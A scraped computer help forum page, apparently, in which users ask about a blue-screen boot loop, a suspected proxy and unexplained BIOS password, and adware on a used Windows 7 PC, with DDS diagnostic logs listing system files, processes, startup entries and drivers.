2015-07-05 05:54:57 113880 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2015-06-18 15:41:56 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2015-06-18 15:41:44 109272 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2015-06-18 15:41:40 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:23:59 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-05-25 18:23:59 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:18:56 43520 ----a-w- C:\Windows\System32\csrsrv.dll
2015-05-25 18:18:56 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-05-25 18:18:54 879104 ----a-w- C:\Windows\System32\advapi32.dll
2015-05-25 18:18:45 47104 ----a-w- C:\Windows\System32\typeperf.exe
2015-05-25 18:18:45 404992 ----a-w- C:\Windows\System32\tracerpt.exe
2015-05-25 18:18:39 112640 ----a-w- C:\Windows\System32\smss.exe
2015-05-25 18:18:32 296960 ----a-w- C:\Windows\System32\rstrui.exe
2015-05-25 18:18:30 43008 ----a-w- C:\Windows\System32\relog.exe
2015-05-25 18:18:19 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-05-25 18:18:19 104448 ----a-w- C:\Windows\System32\logman.exe
2015-05-25 18:18:11 19456 ----a-w- C:\Windows\System32\diskperf.exe
2015-05-25 18:18:08 338432 ----a-w- C:\Windows\System32\conhost.exe
2015-05-25 18:18:04 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-05-25 18:14:26 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-05-25 18:14:04 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-05-25 18:07:34 3989440 ----a-w- C:\Windows\SysWow64\ntkrnlpa.exe
2015-05-25 18:07:34 3934144 ----a-w- C:\Windows\SysWow64\ntoskrnl.exe
2015-05-25 18:04:08 1310744 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-05-25 18:00:44 40448 ----a-w- C:\Windows\SysWow64\typeperf.exe
2015-05-25 18:00:40 364544 ----a-w- C:\Windows\SysWow64\tracerpt.exe
2015-05-25 18:00:28 25600 ----a-w- C:\Windows\SysWow64\setup16.exe
2015-05-25 18:00:25 37888 ----a-w- C:\Windows\SysWow64\relog.exe
2015-05-25 18:00:17 82944 ----a-w- C:\Windows\SysWow64\logman.exe
2015-05-25 18:00:09 17408 ----a-w- C:\Windows\SysWow64\diskperf.exe
2015-05-25 18:00:04 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-05-25 17:59:52 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-05-25 17:59:52 5120 ----a-w- C:\Windows\SysWow64\wow32.dll
2015-05-25 17:59:51 274944 ----a-w- C:\Windows\SysWow64\KernelBase.dll
2015-05-25 17:57:31 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-05-25 17:57:15 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-05-25 17:00:56 36864 ----a-w- C:\Windows\System32\UtcResources.dll
2015-05-25 16:50:38 7680 ----a-w- C:\Windows\SysWow64\instnm.exe
2015-05-25 16:50:36 2048 ----a-w- C:\Windows\SysWow64\user.exe
2015-05-25 16:48:25 6144 ---ha-w- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
2015-05-25 16:48:25 4608 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-25 16:48:25 3584 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-25 16:48:25 3072 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
2015-05-23 03:28:17 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-05-23 03:15:54 503808 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-05-23 03:15:40 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-05-23 03:15:02 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-05-23 03:14:51 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-05-23 03:13:48 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-05-23 03:05:21 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-05-23 03:04:50 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-05-23 02:52:43 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-05-23 02:47:31 4305920 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-05-23 02:37:45 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-05-23 02:37:25 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-05-23 02:20:35 1950720 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-05-22 19:16:55 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-05-22 19:16:44 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-05-22 19:01:42 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-05-22 19:00:54 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-05-22 19:00:47 417792 ----a-w- C:\Windows\System32\html.iec
2015-05-22 19:00:25 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-05-22 18:59:27 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-05-22 18:52:21 6026240 ----a-w- C:\Windows\System32\jscript9.dll
2015-05-22 18:47:49 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-05-22 18:47:34 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-05-22 18:47:03 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-05-22 18:40:17 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-05-22 18:29:31 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-05-22 18:05:28 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-05-22 18:05:06 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-05-22 17:50:20 2426880 ----a-w- C:\Windows\System32\wininet.dll
2015-05-09 03:27:37 98304 ----a-w- C:\Windows\System32\wudriver.dll
2015-05-09 03:27:37 3147776 ----a-w- C:\Windows\System32\wucltux.dll
2015-05-09 03:27:37 191488 ----a-w- C:\Windows\System32\wuwebv.dll
2015-05-09 03:26:38 87040 ----a-w- C:\Windows\System32\WinSetupUI.dll
2015-05-09 03:26:30 12288 ----a-w- C:\Windows\System32\wu.upgrade.ps.dll
2015-05-09 03:26:27 36864 ----a-w- C:\Windows\System32\wuapp.exe
2015-05-09 03:14:46 92672 ----a-w- C:\Windows\SysWow64\wudriver.dll
2015-05-09 03:14:46 173056 ----a-w- C:\Windows\SysWow64\wuwebv.dll
2015-05-09 03:13:32 33792 ----a-w- C:\Windows\SysWow64\wuapp.exe
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\msdxm.ocx
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\dxmasf.dll
2015-04-29 18:21:46 9728 ----a-w- C:\Windows\System32\spwmp.dll
2015-04-29 18:19:43 12625920 ----a-w- C:\Windows\System32\wmploc.DLL
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\msdxm.ocx
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\dxmasf.dll
2015-04-29 18:07:07 8192 ----a-w- C:\Windows\SysWow64\spwmp.dll
2015-04-29 18:05:19 12625408 ----a-w- C:\Windows\SysWow64\wmploc.DLL
2015-04-27 19:23:45 229376 ----a-w- C:\Windows\System32\wintrust.dll
2015-04-27 19:23:13 188416 ----a-w- C:\Windows\System32\cryptsvc.dll
2015-04-27 19:23:13 140288 ----a-w- C:\Windows\System32\cryptnet.dll
2015-04-27 19:05:58 179200 ----a-w- C:\Windows\SysWow64\wintrust.dll
2015-04-27 19:04:37 143872 ----a-w- C:\Windows\SysWow64\cryptsvc.dll
2015-04-27 19:04:37 1174528 ----a-w- C:\Windows\SysWow64\crypt32.dll
2015-04-27 19:04:37 103936 ----a-w- C:\Windows\SysWow64\cryptnet.dll
2015-04-24 18:17:26 633856 ----a-w- C:\Windows\System32\comctl32.dll
.
============= FINISH: 14:17:16.38 ===============

Attached Files

attach.txt (12.2 KB)

I'm trying to start my computer but as soon as I turn it on, it constantly says "Your PC ran into a problem, and needs to restart. We are just collecting some error info, and then we will restart for you." But it won't go past 0%. And goes to a "preparing automatic repair" and nothing happens just goes back to the blue screen. It's constantly doing this. :huh:

Hello ill start with the beggining and sorry if ll do writing mistakes because english is not my mother language.
So i bought from a legit site a cd key for a game , and they gaved me a link to get my cd key, from wich i ve got an error that im using a proxy (i don t know what a proxy is or vpn im not an expert in computers), ive contacted them and they said that im using a proxy vpn, anyway i resolved afterwards they just gaved me the cd key but after that i searched on google about proxy , vpn , and i got into a site called whatismyproxy , that is sayng :
BrowserMozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 ,
Server : Apache
Your internal ip : unknown
Your external ip : (IP) country Romania (wich i am)
This server :(IP) United States, GA Atlanta( no ideea why )

Ok, after i saw United States thing i scanned my PC , and used anti malware, but same thing appeared on that website.

Today i reinstalled my windows and what it maked me panicking is that i saw that my bios has set a password itself , and i never used a password on bios and i can say 100% i didnt changed by myself on accident because i would have remember that .
So as i said im not an expert on computers , please help !

My grandfather recently purchased a used PC from someone. It's running Windows 7 Professional SP1. I think he clicked something he shouldnt have because he is getting alot of ads in new tabs pertaining to whatever the website he is currently on is about (for example, going to techsupportforum brought ads for computer help). It has changed his home page to Yahoo search and there was an extension on his Chrome called PulseBuy I believe? Or something similar.

I've installed avast, comod, and malwarebytes and ran scans on each. Avast detected a PUP and Malwarebytes detected over 160 entries. Since running all the scans, he was still getting these pop ups and avast was displaying a threat detected pop-up about every 10 seconds. After turning off Java in the browser I've had no more warnings from avast but I haven't done much browsing outside of coming here to post this.

Required logs below and attached:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17840
Run by Home 10 at 19:20:43 on 2015-07-09
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.16382.13848 [GMT -7:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Comodo Defense+ *Enabled/Updated* {493CE176-EB84-BC8D-9707-B3ACF7598648}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: COMODO Firewall *Enabled* {CA6681B7-87D1-B25B-86E8-21EB720D8B8E}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\COMODO\COMODO Internet Security\CisTray.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\DELL\Dell Laser MFP 1815\LocalSM\jbDetect.exe
C:\Program Files (x86)\DELL\Dell Laser MFP 1815\PSU\Scan2pc.exe
C:\Program Files (x86)\DELL\Dell Laser MFP 1815\PaperPort\pptd40nt.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Browny02\BrYNSvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\system32\GWX\GWX.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files\COMODO\COMODO Internet Security\cis.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = Google
mWinlogon: Userinit = userinit.exe,
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
mRun: [Dell Laser MFP 1815 SM_JB] C:\Program Files (x86)\DELL\Dell Laser MFP 1815\LocalSM\jbDetect.exe
mRun: [MFP1815_S2P] C:\PROGRAM FILES (X86)\DELL\DELL LASER MFP 1815\PSU\Scan2Pc.exe
mRun: [SSBkgdUpdate] "C:\Program Files (x86)\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
mRun: [PaperPort PTD] "C:\Program Files (x86)\DELL\Dell Laser MFP 1815\PaperPort\pptd40nt.exe"
mRun: [IndexSearch] "C:\Program Files (x86)\DELL\Dell Laser MFP 1815\PaperPort\IndexSearch.exe"
mRun: [BrStsMon00] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe /AUTORUN
mRun: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
Trusted Zone: dell.com
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{62D48FF7-A7AB-46B0-A9DD-D499D2AA3F8A} : NameServer = 156.154.70.22,156.154.71.22
TCP: Interfaces\{62D48FF7-A7AB-46B0-A9DD-D499D2AA3F8A} : DHCPNameServer = 192.168.0.1
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.132\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-mStart Page = Google
x64-BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-Run: [COMODO Internet Security] C:\Program Files\COMODO\COMODO Internet Security\cistray.exe
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;avast! Revert;C:\Windows\System32\drivers\aswRvrt.sys [2015-7-8 65736]
R0 aswVmm;avast! VM Monitor;C:\Windows\System32\drivers\aswVmm.sys [2015-7-8 272248]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswSnx.sys [2015-7-8 1047320]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswsp.sys [2015-7-8 442264]
R1 cmderd;COMODO Internet Security Eradication Driver;C:\Windows\System32\drivers\cmderd.sys [2015-6-5 20672]
R1 cmdGuard;COMODO Internet Security Sandbox Driver;C:\Windows\System32\drivers\cmdguard.sys [2015-6-5 797256]
R1 cmdHlp;COMODO Internet Security Helper Driver;C:\Windows\System32\drivers\cmdhlp.sys [2015-6-5 45856]
R2 aswHwid;avast! HardwareID;C:\Windows\System32\drivers\aswHwid.sys [2015-7-8 29168]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2015-7-8 89944]
R2 aswStm;aswStm;C:\Windows\System32\drivers\aswStm.sys [2015-7-8 137288]
R2 avast! Antivirus;Avast Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2015-7-8 343336]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-13 27136]
R2 SSPORT;SSPORT;C:\Windows\System32\drivers\SSPORT.sys [2006-11-21 11576]
R3 BrYNSvc;BrYNSvc;C:\Program Files (x86)\Browny02\BrYNSvc.exe [2015-4-26 245760]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2015-7-8 25816]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2015-7-8 1133880]
S3 cmdvirth;COMODO Virtual Service Manager;C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2015-6-5 2265792]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-6-11 114688]
S3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2015-7-8 63704]
S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 27136]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2015-3-27 59392]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2015-3-30 1255736]
.
=============== Created Last 30 ================
.
2015-07-09 06:11:09 -------- d-----w- C:\Users\Home 10\AppData\Local\Diagnostics
2015-07-09 05:32:28 113880 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2015-07-09 05:32:16 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2015-07-09 05:32:16 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2015-07-09 05:32:16 109272 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2015-07-09 05:32:16 -------- d-----w- C:\ProgramData\Malwarebytes
2015-07-09 05:32:16 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-07-09 04:24:43 -------- d-----w- C:\ProgramData\Shared Space
2015-07-09 04:24:32 -------- d-----w- C:\Program Files\COMODO
2015-07-08 19:37:30 -------- d-----w- C:\Users\Home 10\AppData\Roaming\AVAST Software
2015-07-08 19:36:57 89944 ----a-w- C:\Windows\System32\drivers\aswMonFlt.sys
2015-07-08 19:36:57 65736 ----a-w- C:\Windows\System32\drivers\aswRvrt.sys
2015-07-08 19:36:57 29168 ----a-w- C:\Windows\System32\drivers\aswHwid.sys
2015-07-08 19:36:57 272248 ----a-w- C:\Windows\System32\drivers\aswVmm.sys
2015-07-08 19:36:57 137288 ----a-w- C:\Windows\System32\drivers\aswStm.sys
2015-07-08 19:36:56 93528 ----a-w- C:\Windows\System32\drivers\aswRdr2.sys
2015-07-08 19:36:55 1047320 ----a-w- C:\Windows\System32\drivers\aswSnx.sys
2015-07-08 19:36:43 43112 ----a-w- C:\Windows\avastSS.scr
2015-07-08 19:35:43 -------- d-----w- C:\Program Files\AVAST Software
2015-07-08 19:35:05 -------- d-----w- C:\ProgramData\AVAST Software
2015-07-08 19:31:02 12221144 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{C40CDC78-D94B-43E7-9DDD-52AB3D8B59F0}\mpengine.dll
2015-06-11 23:30:56 633856 ----a-w- C:\Windows\System32\comctl32.dll
2015-06-11 23:29:56 69888 ----a-w- C:\Windows\System32\drivers\stream.sys
2015-06-11 23:23:52 -------- d-----w- C:\Users\Home 10\AppData\Local\GWX
2015-06-11 22:43:02 -------- d-----w- C:\Users\Home 10\AppData\Local\Google
.
==================== Find3M ====================
.
2015-06-23 20:30:20 300704 ------w- C:\Windows\System32\MpSigStub.exe
2015-06-05 21:35:52 45856 ----a-w- C:\Windows\System32\drivers\cmdhlp.sys
2015-06-05 21:35:50 797256 ----a-w- C:\Windows\System32\drivers\cmdguard.sys
2015-06-05 21:35:46 20672 ----a-w- C:\Windows\System32\drivers\cmderd.sys
2015-06-05 21:34:26 41224 ----a-w- C:\Windows\System32\cmdcsr.dll
2015-06-05 21:34:20 444448 ----a-w- C:\Windows\SysWow64\guard32.dll
2015-06-05 21:34:16 576824 ----a-w- C:\Windows\System32\guard64.dll
2015-06-05 21:33:20 358080 ----a-w- C:\Windows\System32\cmdvrt64.dll
2015-06-05 21:32:52 45760 ----a-w- C:\Windows\System32\cmdkbd64.dll
2015-06-05 21:31:56 288448 ----a-w- C:\Windows\SysWow64\cmdvrt32.dll
2015-06-05 21:31:28 40640 ----a-w- C:\Windows\SysWow64\cmdkbd32.dll
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:23:59 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-05-25 18:23:59 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:18:56 43520 ----a-w- C:\Windows\System32\csrsrv.dll
2015-05-25 18:18:56 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-05-25 18:18:54 879104 ----a-w- C:\Windows\System32\advapi32.dll
2015-05-25 18:18:45 47104 ----a-w- C:\Windows\System32\typeperf.exe
2015-05-25 18:18:45 404992 ----a-w- C:\Windows\System32\tracerpt.exe
2015-05-25 18:18:39 112640 ----a-w- C:\Windows\System32\smss.exe
2015-05-25 18:18:32 296960 ----a-w- C:\Windows\System32\rstrui.exe
2015-05-25 18:18:30 43008 ----a-w- C:\Windows\System32\relog.exe
2015-05-25 18:18:19 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-05-25 18:18:19 104448 ----a-w- C:\Windows\System32\logman.exe
2015-05-25 18:18:11 19456 ----a-w- C:\Windows\System32\diskperf.exe
2015-05-25 18:18:08 338432 ----a-w- C:\Windows\System32\conhost.exe
2015-05-25 18:18:04 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-05-25 18:14:26 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-05-25 18:14:04 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-05-25 18:07:34 3989440 ----a-w- C:\Windows\SysWow64\ntkrnlpa.exe
2015-05-25 18:07:34 3934144 ----a-w- C:\Windows\SysWow64\ntoskrnl.exe
2015-05-25 18:04:08 1310744 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-05-25 18:00:44 40448 ----a-w- C:\Windows\SysWow64\typeperf.exe
2015-05-25 18:00:40 364544 ----a-w- C:\Windows\SysWow64\tracerpt.exe
2015-05-25 18:00:28 25600 ----a-w- C:\Windows\SysWow64\setup16.exe
2015-05-25 18:00:25 37888 ----a-w- C:\Windows\SysWow64\relog.exe
2015-05-25 18:00:17 82944 ----a-w- C:\Windows\SysWow64\logman.exe
2015-05-25 18:00:09 17408 ----a-w- C:\Windows\SysWow64\diskperf.exe
2015-05-25 18:00:04 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-05-25 17:59:52 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-05-25 17:59:52 5120 ----a-w- C:\Windows\SysWow64\wow32.dll
2015-05-25 17:59:51 274944 ----a-w- C:\Windows\SysWow64\KernelBase.dll
2015-05-25 17:57:31 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-05-25 17:57:15 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-05-25 17:08:39 3206144 ----a-w- C:\Windows\System32\win32k.sys
2015-05-25 17:00:56 36864 ----a-w- C:\Windows\System32\UtcResources.dll
2015-05-25 16:50:38 7680 ----a-w- C:\Windows\SysWow64\instnm.exe
2015-05-25 16:50:36 2048 ----a-w- C:\Windows\SysWow64\user.exe
2015-05-25 16:48:25 6144 ---ha-w- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
2015-05-25 16:48:25 4608 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-25 16:48:25 3584 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-25 16:48:25 3072 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
2015-05-23 03:28:17 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-05-23 03:15:54 503808 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-05-23 03:15:40 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-05-23 03:15:02 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-05-23 03:14:51 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-05-23 03:13:48 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-05-23 03:05:21 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-05-23 03:04:50 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-05-23 02:52:43 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-05-23 02:47:31 4305920 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-05-23 02:37:45 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-05-23 02:37:25 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-05-23 02:20:35 1950720 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-05-22 19:16:55 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-05-22 19:16:44 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-05-22 19:01:42 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-05-22 19:00:54 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-05-22 19:00:47 417792 ----a-w- C:\Windows\System32\html.iec
2015-05-22 19:00:25 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-05-22 18:59:27 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-05-22 18:52:21 6026240 ----a-w- C:\Windows\System32\jscript9.dll
2015-05-22 18:47:49 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-05-22 18:47:34 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-05-22 18:47:03 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-05-22 18:40:17 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-05-22 18:29:31 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-05-22 18:18:41 700416 ----a-w- C:\Windows\System32\generaltel.dll
2015-05-22 18:18:29 757248 ----a-w- C:\Windows\System32\invagent.dll
2015-05-22 18:18:24 423424 ----a-w- C:\Windows\System32\devinv.dll
2015-05-22 18:18:22 1021440 ----a-w- C:\Windows\System32\appraiser.dll
2015-05-22 18:18:21 45568 ----a-w- C:\Windows\System32\acmigration.dll
2015-05-22 18:18:21 227328 ----a-w- C:\Windows\System32\aepdu.dll
2015-05-22 18:13:03 1119232 ----a-w- C:\Windows\System32\aeinv.dll
2015-05-22 18:05:28 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-05-22 18:05:06 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-05-22 17:50:20 2426880 ----a-w- C:\Windows\System32\wininet.dll
2015-05-21 13:19:52 193536 ----a-w- C:\Windows\System32\aepic.dll
2015-05-01 13:17:03 124112 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-05-01 13:16:41 102608 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\msdxm.ocx
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\dxmasf.dll
2015-04-29 18:21:46 9728 ----a-w- C:\Windows\System32\spwmp.dll
2015-04-29 18:19:43 12625920 ----a-w- C:\Windows\System32\wmploc.DLL
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\msdxm.ocx
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\dxmasf.dll
2015-04-29 18:07:07 8192 ----a-w- C:\Windows\SysWow64\spwmp.dll
2015-04-29 18:05:19 12625408 ----a-w- C:\Windows\SysWow64\wmploc.DLL
.
